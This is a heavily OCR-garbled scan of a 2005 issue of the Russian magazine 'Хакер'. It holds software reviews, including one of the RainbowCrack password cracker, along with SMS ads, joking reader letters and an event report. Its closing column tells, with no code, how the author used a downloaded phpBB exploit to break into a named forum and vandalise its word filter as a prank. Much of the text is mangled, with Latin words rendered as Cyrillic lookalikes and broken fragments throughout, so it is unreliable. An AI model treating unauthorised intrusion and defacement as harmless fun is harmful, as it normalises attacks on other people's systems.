именно в его страничном смысле: уменьшенные 
виды рабочих пространств (ѵѵогкзрасез), разби- 
тых по категориям (по умолчанию это «Работа», 
«ѵѵѵѵѵѵ», «Почта» и «Игры» - на каждую по четыре 
безкіор'а), дополнительная панель (после перво- 
го запуска в ней кнопка для вызова документа- 
ции АЙегЗІер, глаза хеуез, наблюдающие за кур- 
сором мыши, выпадающее меню с опциями пе- 
резагрузки менеджера и выхода из него, часы; 
кроме того, туда можно встраивать утилиты для 
мониторинга системы, календарь, иконки для 
приложений и т.п.). Меню вызывается нажатием 
левой кнопкой мыши на свободном пространстве 
(после того как оно всплывет, его наряду с про- 
чими окнами можно прикрепить, оставив в виде 
активного окна на рабочем столе), позволяет за- 
пускать программы, настраивать внешний вид 
среды, загружать дополнительные модули и уби- 
рать уже функционирующие, изменять и прос- 
матривать положение, цвета и другие свойства 
окон. Описать все, на что способен АЙегЗіер, не 
представляется мне возможным, так что особо 
заинтересованные могут обратиться к официаль- 
ной документации проекта. 




Зпагеѵѵаге 

Шр://сііітега.Ііи 

15 ^ 5 . I 

И нтересный менеджер 
закладок, сохраняющий в 
своей базе не только адреса, 
но и уменьшенные скриншо- 
ты заинтересовавших тебя 
страниц. Пользу от наличия у 
программы такой продвину- 
той функции переоценить 
трудно. Сколько раз я за- 
думчиво почесывал затылок 
пятерней, пытаясь сообра- 
зить, какой именно сайт 
скрывается в моих заклад- 
ках под тем или иным ничего не значащим названием. Но 
стоило перегнать коллекцию ссылок в МеіѴізиаІіге 
Раѵогііез Огдапігег, как процесс опознания страниц, на ко- 
торых я давно не бывал, стал проходить заметно быстрее. 
Одного взгляда на скриншот обычно хватает, чтобы 
вспомнить, что за сайт ты когда-то «заложил» и почему. 

Не подкачало и качество реализации программы. Интер- 
фейс приятный, настроек много. Очень порадовал тот 
факт, что этот менеджер закладок не завязан на Іпіегпеі 
Ехріогег. По СІгІ+Н МеІѴізиаІіге выхватывает ссылку из ок- 
на любого активного браузера. Скриншот, название зак- 
ладки, ее описание - все это сохраняется автоматически. 

С моей любимой Орег’ой этот менеджер закладок взаимо- 
действовал без проблем. Если верить описанию, с Осли- 
ком, Мозиллой и Огненной Лисой эта программа тоже ус- 
пешно дружит. Короче, тем, кто «закладывает» много и 
часто, советую качать и юзать. Думаю, не пожалеете. 




ѵѵѵѵѵѵ. дет из. г и 
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ТНЕ ШОТЕРПО 
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ѴѴіп 98/2Щ/Хр/2003 



Зіге (в ,дг): 100 Кб 
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Лицензия: 6ИІІ 6РЬ 



О еѵѵап - консольный редактор для так называемого 
А5СІІ агі (искусства текстовой графики) на базе 
псигзез. Одной из его ключевых достопримечательнос- 
тей (судя по постоянным напоминаниям разработчиков) 
является поддержка слоев. Какие в А5СІІ могут быть 
слои? Да точно такие же, как и в обычной графике: абсо- 
лютно независимые части изображения, каждую из кото- 
рых можно самостоятельно изменять, не трогая при этом 
другие слои рисунка, после чего накладывать фрагменты 
друг на друга. Все они в Аеѵѵап могут быть, как и поло- 
жено, прозрачными и видимыми, со своими размерами 
и названиями, а переключение между ними при редакти- 
ровании осуществляется через специальное меню (вы- 
зывается по РЗ); при необходимости уже созданные слои 
можно копировать. Одним из наиболее перспективных 
применений слоев является их использование в качест- 
ве кадров при создании АЗСІІ-анимации (полная подде- 
ржка подобных анимаций ожидается в следующем рели- 
зе Аеѵѵап). Для управления гаммой предлагаются на вы- 
бор разнообразные комбинации фона и шрифтов из 
восьми цветов (каждый шрифт с каждым фоном, плюс 
атрибуты шрифта; суммарно получается вариантов 256). 
Если после создания некоторых элементов с помощью 
выбранных цветов возникает желание сменить их, не ри- 
суя сами символы заново, то специально для этого есть 
функция йпі сеІІ, позволяющая обрабатывать цвета от- 
дельных ячеек без нужды в редактировании содержимо- 
го. Представлена работа с выделенными участками 
изображения: помимо того, что для них также меняется 
фон и цвет шрифтов, сами куски можно перемещать по 
всему пространству, копировать и удалять. 
А если никак не удается определить цвета какой-то конк- 
ретной ячейки, можно воспользоваться местным анало- 
гом пипетки, возвращающей в текущее цветовое сочета- 
ние данные из выбранной части изображения. 



С кажи честно, один из семидесяти пяти тысяч читате- 
лей X, нравится ли тебе организация системы удале- 
ния программ в винде? Вспомни, сколько времени сос- 
тавляется каталог установленных программ, когда ты за- 
ходишь в Панель управления -> Установка и удаление 
программ. Вспомнил? Прикинул? Да за это время мож- 
но успеть кучу дел переделать. Непорядок, имхо. Поэто- 
му ты сейчас вставишь диск X в привод и установишь эту 
софтину, круто экономящую время и нервы. 

Список программ, как по мановению волшебной палоч- 
ки, появится через доли секунд, и ты сможешь удалить 
любое ненужное программное обеспечение, 
дизайнерских наворотов и максимум быстродействия - 
то, что нужно хакеру. 



Минимум Ж 

действия - т 



РгееѴѴаге 



$іге: 23 Кб 



ѵта.хрі$.зіІеЬигд.сот 



ѴѴіпсІоѵѵз 95/98/2К/ХР 



ЗІіагеѵѵаге 
Зіге: 67,5 Кб 
[сепзогеб] 



С амая убойная программа из разряда Х-тулз, 
которая мне когда-либо попадалась. Тесные 
связи в хакерском и варезном андеграунде поз- 
волили мне с огромным трудом выудить полную 
версию этого профессионального продукта. 
Итак, ІМоІерасІ предназначен для записи нот (до 
семи!). Многофункциональный нотный блокнот 
позволяет менять ноты местами, невероятным 
образом преобразовывая мелодию. Причем тут 
мелодия, спросишь ты и будешь прав. А не при- 
чем! Это отмаза для сам понимаешь каких орга- 
нов (я надеюсь, ты правильно понимаешь, анатом 
фигов). На самом деле в нотпаде хакеры хранят 
такие ценнейшие данные, как сгенерированные 
при помощи программы ѴізаОепІ 991 кредитные карты, скрипткидисные уязвимости, пароли от пор- 
носайтов, девятизначных асек, БК-юнитов нулевого левела и многое другое! Советую тебе поставить 
ІМоІерасІ на РСР-диск и никогда не произносить название этой разрушающей силы проги вслух. 



ВПШВ0ЖКПСК1.2 



ѴѴіп 98/2К/ВД2003 



В аіпЬоѵѵСгаск, к сожалению, не поможет тебе взло- 
м 



РгееѴѴаге 
Зіге: 547 Кб 

ѵѵѵѵѵѵ.апРзідІіІсот/гзІ/гаіпЬоѵѵсгаск 



мать радугу на небе и оставить ее там 24 часа в 
сутки. Эта утилита предназначена для другого, а 
именно для быстрого взлома паролей, зашифрован- 
ных такими общепризнанными алгоритмами, как Іпл, 
тсІ5, зЬаІ и другими. В чем же основное различие 
между описываемой тулзой и традиционным брут- 
форсом? Как говорится, одну половину яйца мы нама- 
зали бленд-а-медом, а вторую покрасили гуталином 
:). А разница в том, что во время, когда обычный пе- 
реборщик паролей тихо-мирно занимается отведен- 
ной ему деятельностью, генерируя каждый хэш на хо- 
ду, ВаіпЬоѵѵСгаск составляет специальные промежу- 
точные таблицы вычислений и ломает уже по этим своим данным. Программа может составлять свои таб- 
лицы неделями, и размер их может превысить несколько десятков гигабайт. Например таблицы для паро- 
ля длиной до восьми символов, состоящего из букв нижнего регистра и чисел, весят аж 36 Гб! Но в резуль- 
тате скорость взлома одного пасса возрастает в сотни раз. Еще одна особенность ВаіпЬоѵѵСгаск в том, что 
ты можешь разбить таблицу на несколько кусков и запустить программу на нескольких машинах, что еще 
пуще увеличит скорость взлома. 
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ПП-Л Ъ?№0- 



ВСЕ ЭТО ДОСТУПНО 
В РЕАЛЬНОМ ВРЕМЕНИ 
С ТВОЕГО МОБИЛЬНОГО! 



Хочешь узнать ответ на вопрос? 

Задай свой прикольный вопрос! Для этого пришли на короткий номер 4445 
свой вопрос, поставив в начале текста префикс 98, например 98 іехі_ѵоргоза. 
Должно быть не более 160 символов латинницей или 70 символов кириллицей. 

По итогам месяца авторы лучших вопросов получат класные рингтоны, а их 
вопросы будут опубликованы в ближайшем номере! 

Как стать автором статей в журнал "Хакер"? (код ѵѵ0082) 

Сколько весит Ог.КІоипіг до приема пищи? (код ѵѵ0034) 

Какой ноутбук у СогІштГа? (код ѵѵ0125) съ\П^ ь 

На кого учится Ог.КІоипіг? (код ѵѵ0127) 

Что вставляет ЬооЫік'а? (код ѵѵ0157) 

Где СиТТега знакомится с девушками? (код ѵѵ0158) 



У каждого вопроса есть свой уникальный код (к примеру ѵѵ0082), который 
надо послать на короткий номер 4445 . Ответ придет в виде СМСки. 



Хочешь получить любимый журнал с 
подписями всех редакторов "Хакер"? 

Ответь правильно на вопросы викторины. 



1) Что означают следующие 
байты в хексе: Г5 Е0 ЕА Е5 Р0? 

A) хакер 

B) ламер 

C) гавно 

2 ) Какой ѴШАРГфункцией 
осуществляется запуск нити в 
другом процессе? 

A) МеззадеВох 

B) СгеаіеТИгеасІ 

C) СгеаіеВетоіеТіігеасІ 



3) Какая команда обнуляет 
регистр еЬх? 

A) тоѵ еах, 0 

B) хог еЬх, еЬх 

C) саІІ еЬх 

4 ) Идеальная среда для 
распространения вирусов это: 

A) белковая среда 

B) винды 

C) *гееВ$0 



Ответ присылай в виде комбинаций букв АВС с учетом правильных ответов 
(к примеру ААВС) на короткий номер 4445 , поставив в начале текста 
префикс 98 , например 98 ААВС. Среди правильно ответивших мы 
разыграем призы: десять журналов "Хакера" с подписями всех редакторов! 



Хочешь фирменный лого на свой сотовый? 




Подробности: ѵѵѵѵѵѵ.Игее.ги, (095) 916-7253, (812) 118-4575, зиррогі@Игее.ги. Для заказа картинок включи услугу ѴѴАР/0РР8-доступ в Интернет (оплачивается 
согласно твоему тарифному плану). Проверить возможность закачки можешь, зайдя на ѵѵар-сайт Шр://4446.ш. В случае ошибки уточни настройки в службе 
поддержки твоего оператора. Стоимость запроса на номер 4445 - $0,60 без учета налогов, на номер 4444 - $0,30 без учета налогов, на номер 4446 - $0,90 без 

учета налогов. В случае ошибочного запроса услуга считается оказанной. 




























[хакер 04 [76] 05 150] 




Привет! Весна идет полным ходом! Гормоны в наших неокрепших юно- 
шеских телах так и бьют дальневосточными гейзерами! Толпы девушек 
выходят на улицы в мини-юбках и соблазнительных топиках. Однако не 
меньшее количество СМСок продолжает к нам поступать ежедневно. Та- 
кое чувство, что люди совсем не обращают внимания на весну, а с еще 
большим усердием продолжают читать наш журнал и задавать вопросы 
или просто прикалываться. Мы полагали, что с приходом теплых деньков 
шквал сообщений несколько поубавится. Но мы ошиблись. Такого не про- 
изошло. Может, оно и к лучшему? :) 



ТРЕП" 

С ЧИТПТЕПЯМИ 




Редакционный номер 

+79037714241 




I СиТТеі 

і +79055650975 




I Иікііоз 

і +79037916528 




I Рі.КІоипіг 

і +79265717720 




Г лавный редуктор Хакера начал платить за телефон. Как 
это произошло - никому неизвестно, но факт остается 
фактом: с читателями он беседует, иногда даже ночами. 
Обычно с девушками. Как знать, может, тебе и повезет - 
набирай номер, жди ответа и не унывай :). Даже если ты 
мужчина, он потратит на тебя свое ценное время и расскажет 
часть своей насыщеной биографии. Кстати, насчет биографии 
- наверное, лицам до 18 лет нежелательно ей интересоваться 
:)■ 



Т ак же, как и в прошлом месяце, Никитос возится 
со своей могучей машиной. Нам точно не 
известно, восьмерка у него или девятка, ясно одно - 
модцить он ее будет по полной программе. 
Супертурбина, большие колеса, пулемет на крышу и 
мобильный хот-спот прилагаются. Если хочешь 
обсудить с ним, почему стучат пальцы или не сосут 
клапана - звони. Лучше днем, поскольку ночью он 
способен только материться в трубку и размахивать 
ржавой монтировкой (она досталась ему в довесок к 
машине). 



П о каким вопросам можно обращаться к Лозовскому? 

Да неизвестно. Вот его тут спрашивают, как выучить 
фармакологию, как перерисовать экран в ОеІрГіі, как убить 
Майндворка за хумор, как выписать премию Майндворку 
за креатив, как купить «Хакер» в Нижнем Едрищенске-За- 
Уральем. В общем, просто пиши ему смс и не звони до 
часу дня и ночью, а там посмотрим :). 








Ч: 5узІеш еггог! ВеЬооІ уоиг Іеіербопе іо ііх! (79025697798) 

Плохо знаю английский, но у меня тоже тариф «Вх». 

Ч: Му Мо Ьийаіі і ргоіііі ріѵо па МоіеЬик, Ропіши кіаѵа дгойпиіаз 
и/іМрІа піі| 4 і^ Зіибепіу ( 79139134185 ) 

в,* — » — *- ““**«■“' “7‘ ®" ! 

Ч- Скажи ріеаее, на какой улице живет РогЬ? (79226187525) 

А он живет не на улице Мы скинулись ему на квартиру. 

Ч: Добавь меня в асю. Моя ася 400000. (79226187525) 

Хинт, с каких пор ты сменил сотового оператора? 



Ч‘. Аесть вирусы на мобильник? (7911260401) 2 005>- Это когда сыпятся 

Ч- Увольте Хинта! Второй сидюк опять не пашет! 

й=:====-— 1 
.“іггс:— г— 

исключительно «параши», то условие твоего отда выполнится. 

Ч: Ты N30? Если да, то докажи! 

" Нет, я Лаврентий Берия. Доказывать необходимо? 

ч: А правда, ЧТО у N50 вставные глаза, зубы, и вообще, у него 

голова приклеена? 

* Правда. А еще у него накладной пенис и мозговой протез. 



Ч' Селедка это вещь. Хоть и воняет. РЫСЬ. (79026701879) _ 

!' Вьетнамские девущки - тоже тема. Хоть от них и воняет селедаои. о в 

фч^жйвшь? Что делаешь? Журнал, надеюсь? (79175554652) 
живу футболом, дышу футболом... А делаю все равно журнал .(■ 
ч: Слабо сломать дЫкІорц«е@догосіок.МеІ? Это мой ящик, а пароль 
(79232456212) 

К'. Слабо. Один - ноль, ты победил. , 7 П99К1875251 

Ч- Запиши меня в свою записную книжку. Ріеазе. Доха (79226187525) 

К! Дюка, огурец тебе в ухо! Я тебя занес в свой черный список. 



Ч: Я серийник от кряка потерял. Что делать? 

)! Выпей яду. 

Ч: А я понял! N50 = N05! Да? к ер _ 

Ж Нет, N30 - это НСП, потому что мы его штрафуем час 

зарплату же с бонусами он начисляет. 

Ч; N30, ты тоже лох. 

Ж Все мы лохи, сын мой... 

ч: Лозовский не патологоанатом? Как записаться к нему на прием. 

Нет, Лозовский проктолог. Запись по мылу. 

Ч- Что делать, если по ночам мне снится Бублик? 

1 .«л™»-*»™ 0 ”-”®™* 

ГГГГ, «и. Я*** ' - „ 

1 ГГ ,™Г> — ™ • 

случае неповиновения. 



ч: Меня обпапапа старая ^ 
к: - йяпо, это спои? - Да. - Паа рии гсевп. 




і +79262368364 






1 N50 

! +79165149558 



? 



I РогЬ 

і +79058033384 

Х очешь поговорить с главным взломщиком 

журнала? Все хотят, поэтому его телефон всегда 
занят, а иногда даже заблокирован. Поэтому народ 
обычно звонит другим членам команды и почему-то 
просит дать аську Форба. А мы не даем, это - военная 
тайна. Просто будь настойчив, звони Форбу чаще и 
общайся, общайся, слушай его ангельский, 
завораживающий голос, которому так хочется сообщить 
все свои пароли :). 



Х инт, как известно, наш редактор диска. Он делает 
диск, не обращая внимания на слезные просьбы, 
жалобы и предложения читателей, которые они ему 
шлют СМСками, почтой и излагают голосом. Если ты 
все еще надеешься проложить путь к его сердцу и 
контенту диска, попробуй позвонить. Мы его 
простимулировали, возможно, теперь он даже будет 
отвечать, а если нет - смело подавай жалобу в 
Гаагский трибунал. Это нарушение прав человека. 



О лег - креативщик. Он фонтанирует идеями о 
продвижении журнала «Хакер» на российском и 
международном рынке, однако когда Лозовский 
интересуется у Хинта, почему не сдано диско, 
оказывается, что Олег задерживает описалово 
видео по взлому. А может, Хинт просто 
отмазывается? Если хочешь об этом поговорить, 
звони N50. 





о 



письмо: от: 



кіт <кіт1963@{гопІги> 



Здравствуйте! Возможна ли публикация в Вашем журнале ПЛ статьи об 
операционной системе ВеОЗ и ее клонах? Прошу сообщить на майл. К. Авдеев • 



Вообще-то я гений. С самого раннего детства. Дня на- 
чала я гениально родился второго апреля, а не перво- 
го. Ну а потом и вовсе пошпо-поехапо. То пнтерку в 
школе поставят, то малопьющий сосед, представитель 
местной интеппигенции, по голове погладит, а то и 
смелый милиционер у метро упыбнетсн. Милиционеры 
— они обычно гениев за версту чуют. И сами часто не 
дураки. Скажу вам точно: быть гением — плевое де- 
ло. «О из чего же состоит жизнь гения?» — спросит 
сочувственно читатель. Отвечу честно: из славы, де- 
нег и женщин. Вот тогда гению счастье. Ну и еще яств 
всяческих можно. Если все это есть, можно считать, 
что жизнь гения удалась, и, золотисто пенясь, раз- 
мышлять на досуге о судьбах мира, о видах на урожай, 
ну и еще иногда (для поддержания себя в тонусе) по- 
читывать ваши послания. Читаю и читаю, а вы все пи- 
шете и пишете. Вот и в этот раз все то же самое... 



Дорогой товарищ Авдеев! Большое спасибо за Ваше письмо, с большим 
интересом ознакомились с его содержанием. По существу заданного вопроса 
хотел бы отметить, что в этой жизни возможно все! Вплоть до опубликования в 
нашем журнале «статьи об операционной системе ВеОЗ и ее клонах», как вы 
изволили изящно выразиться. Однако у меня есть и встречный вопрос: почто это 
Вы назвали ][ журналом ПЛ? Что такое вообще это ПЛ? Может быть, имелось в 
виду БЛ? Или там ХЗ? А может быть, даже и ВВ? Вы уж там определитесь, не 
годится такими делами шутить! Несет ли данная аббревиатура какой-то скрытый 
смысл? Хотелось бы узнать об этом поточнее! Напишите нам, а то! • 



О 



письмо: от: 



Глеб Усольцев <дІеЬ_зпаке@таіІ.ги> 



Здравствуйте, многоуважаемая редакация журнала Хакер. Приветствие мое на сегодня обходится без слова «любимого (жур- 
нала)», так как я уже писал о том, что тематика и материалы становятся все хуже и хуже. Естественно это только на мой взгляд так 
как рассуждаю я чисто субъективно. Итак я в который раз прошу вас упразднить следующие рубрики: Треп с читателями, Диско, 
Креатифф, Х-сгеѵѵ, Хумор. Вот эти рубрики лично я не читаю вообще и считаю, что это издевательство и ребячество, которое ни- 
как не походит на профессионализм, а еще это можно назвать баловством. Вот мое мнение, уж не обессудьте. Я конечно же выс- 
казываю свое сугубо субъективное мнение и уже ни на что не надеюсь, но может если я выскажусь мне просто будет легче. 

Все. Перегорел, поэтому по статьям как то разбежались мысли добавить могу в эту сторону только одно - больше практики, боль- 
ше прикладного материала и огромная просьба (можете меня после этого назвать ламьем) в описаниях того или иного инструмен- 
та бывают такие реплики «как это использовать я думаю объяснять не нужно», или «какие возможности это открывает я думаю объ- 
яснять не нужно», нужно!!! • 




ответ к: 






Агсбе, спасибо за такое масштабное и развернутое послание. Во-первых, я очень рад за тебя, что ты перестал ис- 
пользовать слово «любимый» в отношении журнала, уверен, что теперь ты называешь этим прилагательным одну или нес- 
кольких женщин, совершенно распустившихся с приходом теплой погоды. Про тематику и материалы полностью с тобой 
согласен. А чего там скрывать, распоясались хакеришки, пьют, буянят, прогуливают, курят что попало, девок в редакцию 
водят - тьфу, одним словом, срамота одна. Думаю, помогут нам только массовые расстрелы, как в прошлый раз. А чего 
с этими журнал истишкам и цацкаться? Всех в расход, новых потом найдем, верно? А вот про рубрики я с тобой малость 
поспорю: давай хоть Х-сгеѵѵ оставим? Я так долго придумывал это название... А? Как думаешь? А вот что мне совсем не 
понравилось, так это разрешение называть тебя ламьем. Не разрешай этого никому и никогда. А если кто тебя так и на- 
зовет, то что с ним делать - мне тебе объяснять не нужно. Или все-таки нужно? :) в 












Мда.... Привет хаки. Уже третье письмо вам пишу. Воть. На этот раз у меня новая проб- 
лема. Наверное, я вас уже замучал, со своими проблемами, но... прошу все-таки ответить. За- 
канали меня эти придурки. Вообразили себя царями, козлы. Это я про членов нашей сети (а 
кто ж еще они?). Но я не член сети, я другой ее орган. Я отдел ее мозга по модернизации.... 
Правда, меня не кто не слушает т.к. не кто не хочет ее модернизировать. А сеть между прочим 
разваливается.... Ну не об этом. Теперь перейду непосредственно к проблеме. Можно ли сде- 
лать, что ни будь с серваком или, пожалуй, некоторыми компами из нашей сети? Сделать та- 
кое, чтоб хозяин компа получил геморрой на неделю. Чтоб время, проведенное, за компом ему 
показалось адом, или что-то подобное. Не знаю, что там можно сделать (вы же тут главные ха- 
ки, а не я), но делать что-то надо. В общем прошу предложить мне способ заражения гемор- 
роем некоторой части нашей сети этак на несколько дней. Но не обычным, а запоминающим- 
ся на всю жизнь. Воть. Прошу рассмотреть мою просьбу и ответить по адресу: 
ехІгітаІ@таіІ.катсІпаІка.ги , который вы уже, наверное, запомнили. И снова напоминаю, что 
журнал я ваш выписал, не давно и прошу ответить, ѳ 






Серега, скажу тебе честно: ты достал :). Я читаю твои письма с завидным 
постоянством и каждый раз радуюсь, что ты так пока ничего из обещанного не 
сделал. Ниже я напишу специально для тебя справку, ты ее вырежи прямо из журнала 
и просто показывай всем своим врагам, пусть знают, на кого бублик крошат! 



СПРАВКА 

Настоящая справка выдана Сереге, прожи- 
ющем у по адресу ехігітаІѲглаіІ.катсЬаС- 
кат, и удостоверяет в том, что он является 
автором самого доставшего всю Х-СПЕѴѴ 

ной бои! 33 Ч р И бЫЛ Преми Р° ван безопас- 
ной бритвой Вгаип Сгигег 3). Однако, прини- 

оТлХхсПЕШ НаСТ ° ЙЧИеость ообедителя, 
к™» СНЕѴѴ всем настоятельно не ре- 
комендую связываться с Серегой, потому 
Д же безопасная бритва в его руках спо- 

мимо СеЯТЬ СМерТЬ ' разр ~* ихаоа п 0 - 
мимо того, отныне Серега умеет каотить но- 
вый молодежный спепл, отвечающий за «за- 
ражение геморроем некоторой час™ нашей 

“ НЭ Неоколько Дней», в чем и заве- 
ряю всех заинтересованных лиц своей лич- 
НОИ подписью. 

СепЬпег 






письмо: от: 



Агсіпе <агсІпек@таіІ.ги> 



Здороваться не буду, чтобы не тратить лишнее время на написание формальных и, по сути, никому не нуж- 
ных в наше время фраз, являющихся наследием прошлых, менее продвинутых в техническом и культурном отно- 
шении времен, для которых характерно было исполнение различных ритуалов, не имеющих рационального смыс- 
ла, к числу каковых, в частности, можно, без сомнения, отнести и отнимающий время (причем, подчеркну еще 
раз, без принесения реальной практической пользы как конкретным индивидуумам, так и социуму в целом) обы- 
чай здороваться. В связи с вышесказанным перейду сразу к делу: иформативность вашего журнала имеет тенден- 
цию понижаться в зависимости от числового коэффициента (даты), к которому приурочен непосредственно вы- 
пуск издания, в негативную сторону. Подводя итог всему вышесказанному, могу лишь воззвать к улучшению конт- 
роля качества содержания издания и к улучшению контроля качества непосредственно самого издания. Прощать- 
ся не буду по изложенным выше причинам. • 




Глебушка, болезный, здравствуй! [шамкая осклизлыми старческими губами, целует автора пос- 
лания взасос] Ты уж прости меня, старика, не поздороваться с хорошим человеком не могу. Не могу и 
все, удержу никакого нет. [заливается крупными стариковскими слезами, одергивает бороду, сморкает- 
ся в рушник с логотипом ][] Ужо я им говорил-говорил, говорил-говорил - нет, не слушают деда. Ты, го- 
ворят, старпер, не смыслишь в нашем деле ни хрена, вот и молчи лучше. Я и молчу. А коэффициент не- 
уклонно понижается в негативную сторону! [падает на лавку, не в силах сдерживаться и смотреть на по- 
казатели этого бесовского коэффициента, плачет и бубнит на своем] Прости нас, касатик. Это все маль- 
чишки-корректоры, баловники. Мы их пожурим на планерке. А пока до свидания, любезный друг наш Гле- 
бушка, пиши нам побольше. Навеки твой, дедушка Сепіпег. [еще замысловатее шамкая осклизлыми стар- 
ческими губами, целует автора послания взасос вторично и долго обнимает, плача в бороду навзрыд] т 







Итак, свершилось. Мы предлагали тебе порвать сотрудников 
нашей конторы в 02. Так оно и получилось. На мероприятие, 
прошедшее 20 марта в клубе «ЫеНапсІ» (который в центральном 
«Детском мире»), в полной боевой готовности, гремя огнем и 
сверкая блеском стали, прибыло семь читательских команд по 02 
и пятнадцать по С$, которые и противостояли нашим жалким 
полутора командам. В 9:00 началась Саріиге ТОе Над битва. 
Поскольку из наших, хакерских, мало кто понимал, в чем суть этого 
дела, получилось довольно весело. Бублик многократно 
ожесточенно наскакивал на свой флаг (удивляясь, почему тот не 
берется), Хинт попадал в противника через раз и, как всегда, 
виртуозно отмазывался: «У меня жирные руки», «Это не моя мышка, 
своей я играю лучше», а также «Я просто поддавался, чтобы 
читатели потом не плакали». Я играть особо не умел, поэтому 
просто бегал по карте и лупил во все, что движется, просто чтобы 
показать, что умею стрелять. Даже, кстати, набрал несколько 
фрагов, что в Саріиге ТБе Над не имеет особого значения :). В 
результате из нашей команды поймал флаг только один человек — 



Куттер, и то случайно (ага, я все продуманно сделал, взял Ьід и 
квад. — Прим. Купера). Конечно, мы пролетели как фанера над 
столицей Франции и переместились отмечать это достижение к 
стойке местного бара. 

В контре дело шло намного лучше. На разминке Бублик метко 
отстреливал головной конец Куперу, Куттер злился и, вдохнов- 
ленный этой спортивной злостью, бросался в бой, не забывая при 
этом стучать левой рукой по реальной балде Бублика. О том, как 
происходил сам бой, история (в лице меня) умалчивает, поскольку 
в контру я никогда не играл и играть не собираюсь, а за боем 
следить было лениво, ибо я в ней ничего не понимаю. Поэтому я 
сидел в баре, пил томатный сок и общался с противоположным 
полом — о том, что отчет о мероприятии писать придется мне, да 
еще и в день сдачи номера, я тоже пока не подозревал. Кстати, 
противоположный пол в лице двух девушек получил по журналу 
«Хакер», был назван «читательницами» и на основании этого поимел 
право общаться со всей редакцией. В платоническом смысле этого 
слова, конечно I Лозовский@Х-Сге\л/ @ 







тне шонио 8 ьлнееет срмрит^в ре^тіѵдь 

Самая Большая в мире САІЧ-рагіу - 
16-19 июня Сіончёппинг (Швеция). 



Хочешь поехать - звони уполномоченному агенту 
по продаже туров на ОгеатНаск $итшег-2005 - 

компанию ІІТ5 
Телефон - (095) 7237227 
(менеджер проекта - Наталья Кошелева). 



медиапартнеры ОКЕОМНОШ 




[ЮНИТЫ] КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РС_20МЕ РЕВВІІМ НЬЮСЫ 




Западлостроение 

МНОГИЕ ЛЮДИ ЛЮБЯТ ТРЕПАТЬСЯ В АСЬКЕ 
ПО НОЧАМ. ТОЛЬКО ВОТ НЕ ВСЕГДА МОГУТ 
НАЙТИ ОБЩУЮ И ИНТЕРЕСНУЮ ТЕМУ ДЛЯ 
РАЗГОВОРА. ЗАНИМАТЬСЯ АНАЛИТИЧЕСКИМ 
ВЗЛОМОМ СОВЕРШЕННО НЕ ПРЕТ — МЕША- 
ЕТ СОННОЕ СОСТОЯНИЕ И ЛИТР ПИВА, ВЫ- 
ПИТЫЙ НАТОЩАК. ПРО ВИРТУАЛЬНЫЙ СЕКС 
С ДЕВЧОНКАМИ В АСЬКЕ ТОЖЕ МОЖНО ЗА- 
БЫТЬ — ВСЕ ПРИЛИЧНЫЕ ДЕВОЧКИ УЖЕ 
ДАВНО СПЯТ И ВИДЯТ СЕДЬМОЙ ЭРОТИЧЕС- 
КИЙ СОН. ОСТАЕТСЯ ЛИШЬ ВСПОМНИТЬ 
ДЕТСТВО И СОВЕРШИТЬ КАКОЙ-НИБУДЬ ЛЕГ- 
КИЙ ВЗЛОМ I МазІег-Іате-тсізТег 



Мастер-ламастер 
отжигает на форуме 

Остановившись на этой мысли, мы с приятелем (с ним мы, 
кстати, очень много серверов поломали) скачали эксплойт 
для рИрВВ и стали думать, какой бы форум вскрыть. Решение 
пришло быстро — сразу же после просмотра избранных ссы- 
лок. Жертвой стал образцовый сетевой форум по Сіігіх, кото- 
рый располагался по адресу Іі іір : //сіігіх. рр . ги/Іогит . Доби- 
лись мы своих грязных целей очень быстро и уже вовсю лаза- 
ли по админке. Но админка рИрВВ не представляет ничего ин- 
тересного — так, обычный тюнинг форума, ничего больше. И 
тут я наткнулся на очень интересный пункт администрирова- 
ния — автоцензор. Он якобы фильтрует нехорошие слова и за- 
меняет их на звездочки. «Супер! Автоцензор действительно яв- 
ляется гениальной выдумкой программеров рИрВВ!» — поду- 
мал я. И быстро добавил новое правило, согласно которому 
цензор заменяет все слова (маска «*») на эротическое слово 
«пенис». Как показала практика, заменялись только английс- 
кие слова, а реплейс происходил на лету. Таким образом, об- 
новив страницу с интеллигентными названиями тем, мы начали 
биться головой об клаву в судорожных конвульсиях. Специаль- 
но для тебя я подобрал избранные темы и решился их проком- 
ментировать. Обязательно прочитай их все, взрыв смеха я те- 
бе гарантирую! 

[смешные последствия] 

Как узнать пенис-клиентов? 

Очень просто! Подобных нахальных клиентов можно легко отли- 
чить от остальных! Нужно лишь приноровиться, а потом опыт сде- 
лает свое дело. 

Осторожно с пенис-клиентом! 

Вот! Один человек уже нашел такого клиента. Бойся их, бойся! 

Отваливается пенис у клиентов. 

Мда. Сочувствую. Однако не все еще потеряно. Попробуй 
посоветовать своим клиентам обратиться к доктору. Нынеш- 



няя медицина далеко пошла — пришьют, будет смотреться 
как новенький! 

Пенис, пенис и квадратики. 

А нажираться до белой горячки я бы никому не советовал. На 
всякий случай, обратись к наркологу. Проблемы глюков по его 
части. 

Валится пенис при входе в консоль. 

Ну это еще терпимо. Главное, что не при входе в девушку. 

Пенис опять битый :-(. 

Вините того, кто вам его побил, или идите к лору (напомнил анек- 
дот «Доктор, а я «гоп-стоп» не слышу!»). 

Уважаемый пенис, как переназначить сочетания клавиш в пе- 
нис? 

Не скажу. Ты меня оскорбил. Даже учитывая то, что начал со сло- 
ва «уважаемый». 

В чем отличие пенис пенис, пенис и пенис? 

Да ни в чем. Смело примеряй любой! 

А не дорос ли пенис до того, чтобы показывать главную консоль? 

Видимо, еще не дорос. Подрасти и нарасти! 

Пенис не помогает, как настроить пенис??? 

РТЕМ. Почитай камасутру :). Или пиши на мыло — за бутылку пива 
все расскажу. 

У, какое говно этот пенис... 

А никто и не заставлял тебя его пробовать на вкус. 

Подскажите, как автоматом обновлять пенис у пользователей? 
Даже не знаю... Протокол РепізІІрсІаіе еще не придумали. Пред- 
ложи программерам т іеговой, сот. 

Пенис через пенис возможно? 

Возможно. Если отбросить моральные принципы. 

Как склонировать пенис пенисом без заморочек? 

Обратиться к сексопатологу. А вообще, зачем тебе такие изли- 
шества? 

Не могу удалить пенис! Помогите! 

Дорогой, тебе сюда: Шр://сІІ<д-сІиІэ.пагосІ.ги/сІіпіка. Отрежут, 
да еще и с извращениями. 

Расшифруйте, плз, сообщение: пенис пенис пенис пенис пенис 
пенис. 

Вот ты загнул. Да это же хэш необратимого алгоритма шиф- 
рования ВІо\л/РІ5Рі! 



Есть ли смысл ставить пенис, если есть пенис? 

Да-да, поставь еще один, вдруг пригодится. 

